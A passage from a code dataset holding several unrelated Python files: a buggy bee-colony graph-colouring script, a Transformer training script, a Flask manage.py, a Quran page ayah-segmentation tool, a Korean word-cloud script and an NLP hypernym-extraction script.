of parameters of the problem to be optimized\r\nlb = -5.12 #lower bound of the parameters\r\nup = 5.12 # upper bound of the parameters\r\n\r\nruntime = 30\r\n\r\n\r\n#fitness ={} #numpy.empty(foodNumber,1) #vector that holds values of fitness associated with food source \"states\"\r\nprob = {} #numpy.empty(foodNumber,1) #vector that holds the probabilities of a food sources to be chosen\r\n\r\nclass beeColony():\r\n \r\n\r\n def __init__(self, states):\r\n self.states=states\r\n #for state in self.states:\r\n #self.set(state)\r\n \r\n def __str__(self):\r\n \r\n for i in range(len(self.states)):\r\n \r\n #print(\"I am at \", self.position[i], \" meu pbest is \", self.pbest_position[i]) \r\n colors_of_states[self.states[i]] = self.get_color_for_state(self.states[i])\r\n\r\n print (colors_of_states)\r\n \r\n def set2(self,state):\r\n for states in state:\r\n \r\n d=self.calculateFitness(state) \r\n #fitness[state]= d\r\n self.calculateFitness(state)\r\n #fitness_and_state.append([d, state])\r\n \r\n\r\n def calculateFitness(self,state): # im finding the fitness of a node based on \r\n # the Degree of it so how many neighbours\r\n h = 0\r\n for nieghbor in neighbors: # this calculates the fitness for \r\n h+1 # the problem im tryna solve\r\n # numpy.append(color_and_fitness, [state, i]) \r\n return h\r\n \r\n def sortSecond(self,val): #code from https://www.geeksforgeeks.org/python-list-sort/\r\n return val[1] # used to help sort an arrayed list\r\n \r\n # def memorizeBestSource(self): # this should hold the highest number at all time\r\n # or it should hold from the node the least amount\r\n # colors it hasn't taken to colour from this point\r\n \r\n #fitness.sort(reverse =True) # s\r\n #fitness_and_state.sort(self,key =sortSecond, reverse =True) #orders the list from most nodes to least \r\n \r\n\r\n def sendEmployedBees(self,state): # generate a random number from 0 to the # of states\r\n\r\n colors_of_states[state] = colors_of_states.get(state)\r\n fitness[state] = 0 # making the fitness now 0 so that if it selected in\r\n # the future it will already have been assigned a color\r\n\r\n\r\n def calculateProbilities(self): # find the probility that this state chosen is\r\n # better then the ones before or not\r\n # or can have this assign the colours\r\n maxfit = fitness[0]\r\n for state in states:\r\n if (fitness[state]>maxfit):\r\n maxfit = fitness[i]\r\n\r\n # for state in states:\r\n # prob[state]=(0.9*(fitness[state]/maxfit))+0.1\r\n #equation taken from a java code, using it make the probabilities\r\n # probability is calculated using fitness \r\n\r\n def sendOnlookerBees(self,state):\r\n # def get_color_for_state(state):\r\n for color in colors:\r\n if self.promising(state, color):\r\n return colors\r\n\r\n #def sendScoutBees(self):\r\n # null\r\n \r\n def get_color_for_state(self,state):\r\n for color in colors:\r\n if self.promising(state, color):\r\n return color\r\n \r\n def promising(self,state, color):\r\n print(state)\r\n for states2 in states:\r\n for neighbor in neighbors.get(states2): \r\n color_of_neighbor = colors_of_states.get(neighbor)\r\n if color_of_neighbor == color:\r\n return False\r\n\r\n return True\r\n\r\n\r\n\r\n\r\ndef main():\r\n start=time.time()\r\n # for state in states:\r\n # colors_of_states[state] = get_color_for_state(state)\r\n bees =beeColony(states)\r\n #graph=bees.set2(bees.states)\r\n # bees.sendEmployedBees(states)\r\n #bees.calculateProbilities()\r\n bees.sendOnlookerBees(states)\r\n bees.__str__()\r\n #bees.memorizeBestSource()\r\n # bees.sendScoutBees()\r\n \r\n stop = time.time()\r\n duration = stop-start\r\n print (colors_of_states)\r\n print(\"\\n\",\"The time to solve the solution is: \"+str(duration))\r\n \r\n\r\n\r\n\r\nmain() \r\n\r\n\r\n\r\n\r\nstates = ['1','2','3','4','5','6','7','8']\r\nneighbors = {}\r\nneighbors['1'] = ['2', '3', '5']\r\nneighbors['2'] = ['1', '6', '5']\r\nneighbors['3'] = ['1', '4', '5','6']\r\nneighbors['4'] = ['3', '6','8']\r\nneighbors['5'] = ['2', '3', '1','7']\r\nneighbors['6'] = ['2', '3', '4','8']\r\nneighbors['7'] = ['5', '8',]\r\nneighbors['8'] = ['7','6','4']\r\n\r\n\r\n\r\n\r\ndef main2():\r\n start=time.time()\r\n # for state in states:\r\n # colors_of_states[state] = get_color_for_state(state)\r\n bees =beeColony(states)\r\n #graph=bees.set2(bees.states)\r\n # bees.sendEmployedBees(states)\r\n #bees.calculateProbilities()\r\n bees.sendOnlookerBees(states)\r\n bees.__str__()\r\n #bees.memorizeBestSource()\r\n # bees.sendScoutBees()\r\n \r\n stop = time.time()\r\n duration = stop-start\r\n print (colors_of_states)\r\n print(\"\\n\",\"The time to solve the solution is: \"+str(duration))\r\n \r\n\r\n\r\n\r\nmain2()\r\n\r\n\r\n\r\n\r\nstates = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20']\r\nneighbors = {}\r\nneighbors['1'] = ['6', '3', '2']\r\nneighbors['2'] = ['1', '4', '10']\r\nneighbors['3'] = ['1', '6', '4','5']\r\nneighbors['4'] = ['3', '2','16','8','5']\r\nneighbors['5'] = ['6','3','4','13','15','7']\r\nneighbors['6'] = ['1','3','5']\r\nneighbors['7'] = ['5', '9','19']\r\nneighbors['8'] = ['4','14','11','9','12']\r\nneighbors['9'] = ['8','12','7','18']\r\nneighbors['10'] = ['2','16']\r\nneighbors['11'] = ['14','8']\r\nneighbors['12'] = ['8','17','9']\r\nneighbors['13'] = ['5','15']\r\nneighbors['14'] = ['16','11','8']\r\nneighbors['15'] = ['13','5','20']\r\nneighbors['16'] = ['10','4','14']\r\nneighbors['17'] = ['12']\r\nneighbors['18'] = ['9','19']\r\nneighbors['19'] = ['20','7','18']\r\nneighbors['20'] = ['15','19']\r\n\r\n\r\n\r\n\r\n\r\ndef main3():\r\n start=time.time()\r\n # for state in states:\r\n # colors_of_states[state] = get_color_for_state(state)\r\n bees =beeColony(states)\r\n #graph=bees.set2(bees.states)\r\n # bees.sendEmployedBees(states)\r\n #bees.calculateProbilities()\r\n bees.sendOnlookerBees(states)\r\n bees.__str__()\r\n #bees.memorizeBestSource()\r\n # bees.sendScoutBees()\r\n \r\n stop = time.time()\r\n duration = stop-start\r\n print (colors_of_states)\r\n print(\"\\n\",\"The time to solve the solution is: \"+str(duration))\r\n \r\n\r\n\r\n\r\nmain3()\r\n\r\n","sub_path":"ABC2.py","file_name":"ABC2.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"416308092","text":"# For data loading.\r\nfrom torchtext import data, datasets\r\nfrom data_process import ParallelDataset, Batch, subsequent_mask, batch_size_fn, read_corpus\r\nimport time\r\nimport torch\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\n\r\nfrom model import make_model\r\nfrom optim import LabelSmoothing, NoamOpt\r\nfrom loss import SimpleLossCompute\r\nimport argparse\r\n\r\n\r\ndef run_epoch(data_iter, model, loss_compute):\r\n \"Standard Training and Logging Function\"\r\n start = time.time()\r\n total_tokens = 0\r\n total_loss = 0\r\n tokens = 0\r\n for i, batch in enumerate(data_iter):\r\n out = model.forward(batch.src, batch.trg,\r\n batch.src_mask, batch.trg_mask)\r\n loss = loss_compute(out, batch.trg_y, batch.ntokens)\r\n total_loss += loss\r\n total_tokens += batch.ntokens\r\n tokens += batch.ntokens\r\n if i % opt.display_freq == 1:\r\n elapsed = time.time() - start\r\n print(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\" %\r\n (i, loss / batch.ntokens, tokens / elapsed))\r\n start = time.time()\r\n tokens = 0\r\n return total_loss / total_tokens\r\n\r\n\r\nclass MyIterator(data.Iterator):\r\n def create_batches(self):\r\n if self.train:\r\n def pool(d, random_shuffler):\r\n for p in data.batch(d, self.batch_size * 100):\r\n p_batch = data.batch(\r\n sorted(p, key=self.sort_key),\r\n self.batch_size, self.batch_size_fn)\r\n for b in random_shuffler(list(p_batch)):\r\n yield b\r\n\r\n self.batches = pool(self.data(), self.random_shuffler)\r\n\r\n else:\r\n self.batches = []\r\n for b in data.batch(self.data(), self.batch_size,\r\n self.batch_size_fn):\r\n self.batches.append(sorted(b, key=self.sort_key))\r\n\r\n\r\ndef rebatch(pad_idx, batch):\r\n \"Fix order in torchtext to match ours\"\r\n # ????\r\n src, trg = batch.src[0], batch.trg[0]\r\n return Batch(src, trg, pad_idx)\r\n\r\n\r\n# load\r\ndef load_data(path, max_src_len, max_trg_len, BATCH_SIZE, device):\r\n\r\n # Extra vocabulary sym bols\r\n pad_token = \"\"\r\n unk_token = \"\"\r\n bos_token = \"\"\r\n eos_token = \"\"\r\n\r\n extra_tokens = [pad_token, unk_token, bos_token, eos_token]\r\n\r\n PAD = extra_tokens.index(pad_token)\r\n UNK = extra_tokens.index(unk_token)\r\n BOS = extra_tokens.index(bos_token)\r\n EOS = extra_tokens.index(eos_token)\r\n\r\n SRC = data.Field(sequential=True, use_vocab=False, include_lengths=True, batch_first=True,\r\n pad_token=PAD, unk_token=UNK, init_token=BOS, eos_token=EOS, )\r\n TGT = data.Field(sequential=True, use_vocab=False, include_lengths=True, batch_first=True,\r\n pad_token=PAD, unk_token=UNK, init_token=BOS, eos_token=EOS, )\r\n fields = (SRC, TGT)\r\n\r\n # path = 'small-train.t7'\r\n dataset = torch.load(path)\r\n train_src, train_tgt = dataset['train_src'], dataset['train_tgt']\r\n dev_src, dev_tgt = dataset['dev_src'], dataset['dev_tgt']\r\n\r\n def filter_pred(example):\r\n if len(example.src) <= max_src_len and len(example.trg) <= max_trg_len:\r\n return True\r\n return False\r\n\r\n train = ParallelDataset(train_src, train_tgt, fields=fields, filter_pred=filter_pred)\r\n val = ParallelDataset(dev_src, dev_tgt, fields=fields, filter_pred=filter_pred)\r\n\r\n MIN_FREQ = 1\r\n SRC.build_vocab(train.src, min_freq=MIN_FREQ)\r\n TGT.build_vocab(train.trg, min_freq=MIN_FREQ)\r\n\r\n #########################################\r\n train_iter = MyIterator(train, batch_size=BATCH_SIZE, device=device,\r\n repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n batch_size_fn=batch_size_fn, train=True)\r\n valid_iter = MyIterator(val, batch_size=BATCH_SIZE, device=device,\r\n repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n batch_size_fn=batch_size_fn, train=False)\r\n return SRC, TGT, train_iter, valid_iter\r\n\r\n\r\ndef greedy_decode(model, src, src_mask, max_len, start_symbol):\r\n memory = model.encode(src, src_mask)\r\n ys = torch.ones(1, 1).fill_(start_symbol).type_as(src.data)\r\n\r\n for i in range(max_len - 1):\r\n out = model.decode(memory, src_mask, Variable(ys), Variable(subsequent_mask(ys.size(1)).type_as(src.data)))\r\n prob = model.generator(out[:, -1])\r\n _, next_word = torch.max(prob, dim=1)\r\n next_word = next_word.data[0]\r\n ys = torch.cat([ys, torch.ones(1, 1).type_as(src.data).fill_(next_word)], dim=1)\r\n return ys\r\n\r\n\r\ndef main(opt):\r\n use_cuda = torch.cuda.is_available()\r\n if use_cuda:\r\n print(\"Use GPU...\")\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n # device = torch.device(\"cpu\")\r\n SRC, TGT, train_iter, valid_iter = load_data(opt.data_path, max_src_len=opt.max_src_seq_len, max_trg_len=opt.max_tgt_seq_len, BATCH_SIZE=opt.batch_size, device=device)\r\n pad_idx = TGT.vocab.stoi[1]\r\n model = make_model(len(SRC.vocab), len(TGT.vocab), N=opt.n_layers, d_model=opt.d_model, d_ff=opt.d_ff, h=opt.n_heads, dropout=opt.dropout).to(device)\r\n criterion = LabelSmoothing(size=len(TGT.vocab), padding_idx=pad_idx, smoothing=0.1).to(device)\r\n model_opt = NoamOpt(model.src_embed[0].d_model, 1, opt.n_warp_steps,\r\n torch.optim.Adam(model.parameters(), lr=opt.lr, betas=(0.9, 0.98), eps=1e-9))\r\n for epoch in range(opt.epochs):\r\n print('epoch:', epoch)\r\n model.train()\r\n run_epoch((rebatch(pad_idx, b) for b in train_iter),\r\n model,\r\n SimpleLossCompute(model.generator, criterion, model_opt))\r\n model.eval()\r\n run_epoch((rebatch(pad_idx, b) for b in valid_iter), model,\r\n SimpleLossCompute(model.generator, criterion, opt=None))\r\n\r\n torch.save(model, opt.save_model)\r\n\r\n\r\n# ################################\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Training Hyperparams')\r\n parser.add_argument('-data_path', default='vatex_len_40-train.t7', help='Path to the preprocessed data')\r\n\r\n # network params\r\n parser.add_argument('-d_model', type=int, default=512)\r\n parser.add_argument('-d_ff', type=int, default=2048)\r\n parser.add_argument('-n_heads', type=int, default=8)\r\n parser.add_argument('-n_layers', type=int, default=6)\r\n parser.add_argument('-dropout', type=float, default=0.1)\r\n\r\n # training params\r\n parser.add_argument('-lr', type=float, default=0.02)\r\n parser.add_argument('-epochs', type=int, default=1)\r\n parser.add_argument('-batch_size', type=int, default=128)\r\n parser.add_argument('-max_src_seq_len', type=int, default=50)\r\n parser.add_argument('-max_tgt_seq_len', type=int, default=50)\r\n # parser.add_argument('-max_grad_norm', type=float, default=None)\r\n parser.add_argument('-n_warp_steps', type=int, default=4000)\r\n parser.add_argument('-display_freq', type=int, default=100)\r\n # parser.add_argument('-log', default=None)\r\n # parser.add_argument('-model_path', type=str, default='None')\r\n parser.add_argument('-save_model', type=str, default='final_model.pkl')\r\n\r\n opt = parser.parse_args()\r\n print(opt)\r\n main(opt)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Transformer/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"654447831","text":"import os\nimport unittest\n\nfrom app.init_app import socketIo, app\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nfrom app import blueprint\nfrom app.main import db\n\n\nif len(app.blueprints) < 1:\n app.register_blueprint(blueprint)\n app.app_context().push()\n app.config['ERROR_404_HELP'] = False\n\nmanager = Manager(app)\n\nmigrate = Migrate(app, db)\n\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef run():\n socketIo.run(app)\n\n\n@manager.command\ndef test():\n tests = unittest.TestLoader().discover('app/test', pattern='test*.py')\n result = unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n return 0\n return 1\n\n\nif __name__ == '__main__':\n manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181510598","text":"#!/usr/bin/env python2\nimport os\nimport argparse\nimport csv\nimport cv2\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom verses_count import verses_count\nfrom ayat import find_ayat, draw, output_aya_segment\nfrom utils import safe_makedir, load_lines\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_path', type=str, required=True,\n help='''Path to input folder containing PNG images''')\n parser.add_argument('--output_path', type=str, required=True,\n help='''Path to output folder to generate verification images in''')\n parser.add_argument('--separator1_path', type=str, required=True,\n help='''Path to separator image template for pages 1 and 2''')\n parser.add_argument('--separator3_path', type=str, required=True,\n help='''Path to separator image template for pages 3 up to the end''')\n parser.add_argument('--count_method', type=str, choices=list(verses_count.keys()), required=True,\n help='''Counting method to use''')\n parser.add_argument('--pages', type=str, default='1..604',\n help='''Comma seprated page numbers or ranges, default is 1..604''')\n parser.add_argument('--start_sura', type=str, default='1',\n help='''Start sura numbers for each page in the input pages, default = 1''')\n parser.add_argument('--start_aya', type=str, default='1',\n help='''Start aya numbers for each page in the input pages, default = 1''')\n parser.add_argument('--start_sura_aya_tsv', type=str,\n help='''If specified, reads start_sura and start_aya numbers from recitation tsv''')\n parser.add_argument('--matching_threshold', type=float, default=0.42,\n help='''Matching threshold to match aya separators, default = 0.42''')\n return parser.parse_args()\n\n\ndef parse_start_tuples(args):\n if args.start_sura_aya_tsv:\n return read_start_tuples_tsv(args.pages, args.start_sura_aya_tsv)\n else:\n return read_start_tuple_args(args.pages, args.start_sura, args.start_aya)\n\n\ndef read_start_tuples_tsv(pages, tsv):\n # read tsv and return tuples (page, sura, ayah) for lines with lineId == 1\n if not os.path.isfile(tsv):\n raise RuntimeError(\"File: '%s' not found\" % tsv)\n\n # open file in universal new line mode: U\n with open(tsv, 'rU') as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t', quotechar='\"')\n # file format: rewayaId\tpageId\tsuraId\tverseId\tlineId\tdata\n pages_dict = {}\n for row in reader:\n if row[4] == '1' and pages_dict.get(int(row[1])) == None:\n pages_dict[int(row[1])] = (int(row[2]), int(row[3]))\n\n tuples = []\n total_pages = 0\n for page in pages.split(','):\n page_range = page.split('..')\n start_page = int(page_range[0])\n end_page = int(page_range[-1])\n total_pages += end_page - start_page + 1\n tuples.append({\n 'start_page': start_page,\n 'end_page': end_page,\n 'start_sura': pages_dict[start_page][0],\n 'start_aya': pages_dict[start_page][1]\n })\n return total_pages, tuples\n\ndef read_start_tuple_args(pages, start_sura, start_aya):\n tuples = []\n pages = pages.split(',')\n suras = start_sura.split(',')\n ayahs = start_aya.split(',')\n total_pages = 0\n\n if not (len(pages) == len(suras) == len(ayahs)):\n raise ValueError('Lengths of pages, start_sura and start_aya arguments must match')\n\n for page, sura, ayah in zip(pages, suras, ayahs):\n page_range = page.split('..')\n start_page = int(page_range[0])\n end_page = int(page_range[-1])\n total_pages += end_page - start_page + 1\n tuples.append({\n 'start_page': start_page,\n 'end_page': end_page,\n 'start_sura': int(sura),\n 'start_aya': int(ayah)\n })\n return total_pages, tuples\n\ndef main_find_ayat(progress_bar, all_pages_lines, count_method, start_page, end_page,\n start_sura, start_aya, separator1_path, separator3_path,\n matching_threshold, input_path, output_path, segments_path):\n # by default, we don't increase the ayah on the top of this loop\n # to handle ayat that span multiple pages - this flag allows us to\n # override this.\n end_of_ayah = False\n sura = start_sura\n ayah = 1\n default_lines_to_skip = 2\n count_ayat = verses_count[count_method]\n\n if start_page == 1: # default behavior for page 1\n # in kofy/makky basmallah is counted as aya 1\n if count_method == 'kofy' or count_method == 'makky':\n lines_to_skip = 1\n else:\n lines_to_skip = 2\n elif start_page == 2: # default behavior for page 2\n lines_to_skip = 2\n elif start_sura == 9 and start_aya < 2: # skip only 1 line (header) for tawba\n lines_to_skip = 1\n elif start_aya < 1: # skip 1 if ayah = 0 (basmalah), skip 2 if ayah = -1 (header)\n lines_to_skip = 1 - start_aya\n else: # don't skip anything, starting from the middle of a sura\n lines_to_skip = 0\n ayah = start_aya\n\n for i in range(start_page, end_page + 1):\n filename = str(i) + '.png'\n lines = all_pages_lines[i]\n\n img_gray = cv2.imread(input_path + filename, -1)\n if i == 1 or i == 2:\n template = cv2.imread(separator1_path, -1)\n else:\n template = cv2.imread(separator3_path, -1)\n\n ayat = find_ayat(img_gray, template, matching_threshold)\n\n tpl_width = template.shape[1]\n\n current_line = 0\n x_pos_in_line = -1\n num_lines = len(lines)\n\n with open(segments_path + str(i).zfill(3) + \".sql\", \"wb\") as segments_file:\n first = True\n for ayah_item in ayat:\n if ((end_of_ayah or not first) and count_ayat[sura - 1] == ayah):\n sura = sura + 1\n ayah = 1\n lines_to_skip = default_lines_to_skip\n if sura == 9:\n lines_to_skip = lines_to_skip - 1\n end_of_ayah = False\n elif (end_of_ayah or not first):\n ayah = ayah + 1\n end_of_ayah = False\n first = False\n y_pos = ayah_item[1]\n\n pos = 0\n for line in range(current_line, num_lines):\n cur_line = lines[line]\n miny = cur_line[0][1]\n maxy = cur_line[1][1]\n cur_line_minx = cur_line[0][0]\n cur_line_maxx = cur_line[1][0]\n if lines_to_skip > 0:\n # it is header if skipping 2 lines (obviously)\n # or skipping 1 line and we are in sura 9 tawba (no basmala)\n # or skipping 1 line and we are in sura 1 fatiha and first line\n # (some counting methods don't have basmalah, in which case they skip only 1 line)\n if lines_to_skip == 2 or lines_to_skip == 1 and (sura == 9 or sura == 1 and line == 0): # header\n vals = (i, line + 1, sura, -1, 1, cur_line_minx, cur_line_maxx, miny, maxy)\n else: # basmala\n vals = (i, line + 1, sura, 0, 1, cur_line_minx, cur_line_maxx, miny, maxy)\n output_aya_segment(vals, img_gray, segments_file)\n lines_to_skip = lines_to_skip - 1\n current_line = current_line + 1\n continue\n pos = pos + 1\n if y_pos <= maxy:\n # we found the line with the ayah\n maxx = cur_line_maxx\n if x_pos_in_line > 0:\n maxx = x_pos_in_line\n minx = ayah_item[0]\n # small value indicating that the separator is the last thing comes in line\n # or page 1 and second line (always basmalah), this is to cover basmalah when counted as aya 1\n if minx < tpl_width/2 or i == 1 and line == 1:\n minx = 0\n end_of_sura = False\n if count_ayat[sura - 1] == ayah:\n end_of_sura = True\n\n # last aya in sura segment must extend to the leftmost, the empty space is ugly\n # also last ayah in page 2 must extend to the leftmost\n if end_of_sura or i == 2 and ayah_item == ayat[-1]:\n minx = 0\n\n vals = (i, line + 1, sura, ayah, pos, minx, maxx, miny, maxy)\n output_aya_segment(vals, img_gray, segments_file)\n\n # check if this is header/basmalah, it must occupy the whole line\n if (vals[3] == -1 or vals[3] == 0) and (vals[5] != 0 or vals[6] != cur_line_maxx):\n raise RuntimeError(\n 'Something is wrong: Header or Basmalah are not occuping the whole line')\n\n if end_of_sura or abs(minx - cur_line_minx) < tpl_width/2:\n x_pos_in_line = -1\n current_line = current_line + 1\n if current_line == num_lines:\n # last line, and no more ayahs - set it to increase\n end_of_ayah = True\n else:\n x_pos_in_line = minx\n break\n else:\n # we add this line\n maxx = cur_line_maxx\n if x_pos_in_line > 0:\n maxx = x_pos_in_line\n x_pos_in_line = -1\n current_line = current_line + 1\n vals = (i, line + 1, sura, ayah, pos, cur_line_minx, maxx,\n miny, maxy)\n output_aya_segment(vals, img_gray, segments_file)\n\n # draw aya separators\n draw(img_gray, template, ayat)\n\n # handle cases when the sura ends on a page, and there are no more\n # ayat. this could mean that we need to adjust lines_to_skip (as is\n # the case when the next sura header is at the bottom) or also add\n # some ayat that aren't being displayed at the moment.\n if end_of_sura:\n # end of sura always means x_pos_in_line is -1\n sura = sura + 1\n ayah = 1\n lines_to_skip = default_lines_to_skip\n if sura == 9:\n lines_to_skip = lines_to_skip - 1\n end_of_ayah = False\n while line + 1 < num_lines and lines_to_skip > 0:\n line = line + 1\n if lines_to_skip == 2 or lines_to_skip == 1 and sura == 9: # header\n vals = (i, line + 1, sura, -1, 1, lines[line][0][0], lines[line][1][0], lines[line][0][1], lines[line][1][1])\n else: # basmala\n vals = (i, line + 1, sura, 0, 1, lines[line][0][0], lines[line][1][0], lines[line][0][1], lines[line][1][1])\n output_aya_segment(vals, img_gray, segments_file)\n lines_to_skip = lines_to_skip - 1\n if lines_to_skip == 0 and line + 1 != num_lines:\n ayah = 0\n\n # we have some lines unaccounted for or stopped mid-line\n if x_pos_in_line != -1 or line + 1 != num_lines:\n if x_pos_in_line == -1:\n line = line + 1\n pos = 0\n ayah = ayah + 1\n # we ignore pages 1 and 2 because they always have empty spaces at the end\n if i > 2:\n for l in range(line, num_lines):\n cur_line = lines[l]\n pos = pos + 1\n maxx = cur_line[1][0]\n if x_pos_in_line > 0:\n maxx = x_pos_in_line\n x_pos_in_line = -1\n vals = (i, l + 1, sura, ayah, pos, cur_line[0][0], maxx,\n cur_line[0][1], cur_line[1][1])\n output_aya_segment(vals, img_gray, segments_file)\n\n # done with detecting segments, now write using cv2\n image_name = output_path + str(i).zfill(3) + \".png\"\n cv2.imwrite(image_name, img_gray)\n\n # now paste segmented to original\n original = Image.open(input_path + filename).convert('RGBA')\n segmented = Image.open(image_name).convert('RGBA')\n segmented.paste(original, mask=original)\n segmented.save(image_name, \"PNG\")\n\n # finally increment progress bar\n progress_bar.update(1)\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n total_pages, start_tuples = parse_start_tuples(args)\n\n input_path = args.input_path + '/'\n output_path = safe_makedir(args.output_path + '/ayat/')\n segments_path = safe_makedir(args.output_path + '/segments/')\n lines = load_lines(args.output_path)\n\n print(\"Finding aya boundaries using separator templates into \" + output_path + \"...\")\n with tqdm(total=total_pages) as pbar:\n for tuple in start_tuples:\n main_find_ayat(progress_bar=pbar,\n all_pages_lines=lines,\n start_page=tuple['start_page'],\n end_page=tuple['end_page'],\n start_sura=tuple['start_sura'],\n start_aya=tuple['start_aya'],\n count_method=args.count_method,\n separator1_path=args.separator1_path,\n separator3_path=args.separator3_path,\n matching_threshold=args.matching_threshold,\n input_path=input_path,\n output_path=output_path,\n segments_path=segments_path)\n","sub_path":"detect_ayat.py","file_name":"detect_ayat.py","file_ext":"py","file_size_in_byte":12694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"4675312","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 7/21/17\nAuthor: Jihoon Kim\n\"\"\"\n\n\nfrom konlpy.tag import Twitter\nfrom konlpy.utils import pprint\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.rc('font', family=\"NanumBarunGothic\")\nimport seaborn as sns\nimport pandas as pd\nfrom wordcloud import WordCloud, ImageColorGenerator\nfrom collections import Counter\nimport numpy as np\nfrom PIL import Image\ndata = pd.read_csv('./data/c_data/덕수궁.csv')\n\ntext_sample = data.review\n\nlength = data.shape[0]\ntwit = Twitter()\npos_counter = Counter()\nfor i in range(length):\n\n twit_pos = twit.pos(text_sample[i])\n pos_counter += Counter(twit_pos)\n print(\"{}th Document is being processed.\".format(i))\n\ncount_df = pd.DataFrame.from_dict(pos_counter, orient='index').reset_index()\ncount_df.rename(columns={'index': 'pos', 0: 'count'}, inplace=True)\nsorted = count_df.sort_values(by='count', ascending=False)\nsorted['pos_word'] = sorted.pos.apply(lambda x: x[0])\nsorted['pos'] = sorted.pos.apply(lambda x: x[1])\n\nav_pos = ['Noun', 'Verb', 'Adjective', 'Adverb']\ngo_index = sorted.pos.isin(av_pos)\nsorted = sorted[go_index]\n\n\nword = list(sorted.pos_word)\nword = ' '.join(word)\npalace_coloring = np.array(Image.open(\"./cablecar.png\"))\nwc = WordCloud(background_color=\"white\", max_words=2000, mask=palace_coloring,\n max_font_size=40, random_state=42)\n# generate word cloud\nwc.generate(word)\n\n# create coloring from image\nimage_colors = ImageColorGenerator(palace_coloring)\n# recolor wordcloud and show\n# we could also give color_func=image_colors directly in the constructor\nplt.figure()\nplt.imshow(wc.recolor(color_func=image_colors), interpolation=\"bilinear\")\nplt.axis(\"off\")\n\nplt.figure()\nplt.imshow(palace_coloring, cmap=plt.cm.gray, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.show()","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"563705907","text":"import nltk\nimport re\nlemmatizer=nltk.stem.WordNetLemmatizer()\n\n# read in and clean corpus\nwith open('test_corpus.txt','r') as f:\n data=f.read()\n\ndef clean_line(file_line):\n sentences=nltk.sent_tokenize(file_line)\n new_sentences=[]\n for sentence in sentences:\n #sentence=re.sub(r'[^a-zA-z\\s]',r'',sentence)\n #sentence=re.sub(\"(?<=[a-z])'(?=[a-z])\", \"\", sentence)\n words=sentence.split()\n words=[word.lower() for word in words]\n #words=[lemmatizer.lemmatize(word) for word in words]\n sentence=' '.join(words)\n new_sentences.append(sentence)\n return new_sentences\n \n\n# test yield \ndef get_sentences(filename): \n with open(filename,'r') as f:\n for line in f:\n yield line\n\n# sentences=get_sentences('test_corpus.txt')\n# type(next(sentences))\n\n# Gold hypernyms\nimport pandas as pd\nhypers=pd.read_table('/home/srawat/Documents/Hearst Pattern Analysis/wbless/wbless.tsv')\nhypers=hypers[hypers.relation=='hyper']\nhypers=hypers.reset_index(drop=True)\nhypos=hypers.word1\nhypers=hypers.word2\n\n# Extractions from corpus\ndef extract_sents(filename,hypos,hypers):\n extractions=[]\n with open(filename,'r') as f:\n for line in f:\n sents=clean_line(line)\n for sent in sents:\n words=sent.split()\n for w1,w2 in zip(hypos,hypers):\n if w1 in words and w2 in words:\n extractions.append((sent,w1,w2))\n return extractions\n\n# Extractions from corpus without pre-processing\ndef extract_sents(filename,hypos,hypers):\n extractions=[]\n with open(filename,'r') as f:\n for line in f:\n sents=nltk.sent_tokenize(line)\n for sent in sents:\n words=sent.split()\n for w1,w2 in zip(hypos,hypers):\n if w1 in words and w2 in words:\n extractions.append((sent,w1,w2))\n return extractions\ntest_extractions=extract_sents('test_corpus.txt',hypos,hypers)\n \n# !TODO significantly less extractions without pre-processing\n\n# Check dep paths between pairs\n# Format: sent,hypo,hyper\nimport networkx as nx\nimport spacy\nnlp=spacy.load('en_core_web_sm')\n\ndef extract_dep_paths(extractions):\n dep_paths=[]\n for sent,hypo,hyper in extractions:\n doc=nlp(sent)\n edges=[]\n for token in doc:\n for child in token.children:\n edges.append(('{0}'.format(token.lower_),'{0}'.format(child.lower_)))\n graph=nx.Graph(edges)\n try:\n path=nx.shortest_path(graph,source=hypo,target=hyper)\n paths=[]\n for word in path:\n for token in doc:\n if word==token.text.lower():\n paths.append(token.text+'-'+token.pos_+'-'+token.dep_)\n paths=' '.join(paths)\n dep_paths.append((paths,hypo,hyper))\n except nx.NetworkXNoPath:\n pass\n return dep_paths\n\ntest_dep_paths=extract_dep_paths(test_extractions)\n\n# All dependencies\nall_deps=[]\nfor i in range(len(test_dep_paths)):\n sent=test_dep_paths[i][0]\n deps=[x.split('-')[2] for x in sent.split()]\n all_deps.append(deps)\n\n# unique dependencies\nimport itertools\ndeps=list(itertools.chain.from_iterable(all_deps))\ndeps=list(set(deps))\n\n# Dict vocab for deps\ndep_dict={}\nfor i in range(len(deps)):\n if deps[i] in dep_dict:\n pass\n else:\n dep_dict[deps[i]]=i\n\n# Encode dep paths extracted and freq\nenc_all_deps=[]\nfor dep in all_deps:\n _=[]\n for obj in dep:\n _.append(dep_dict[obj])\n 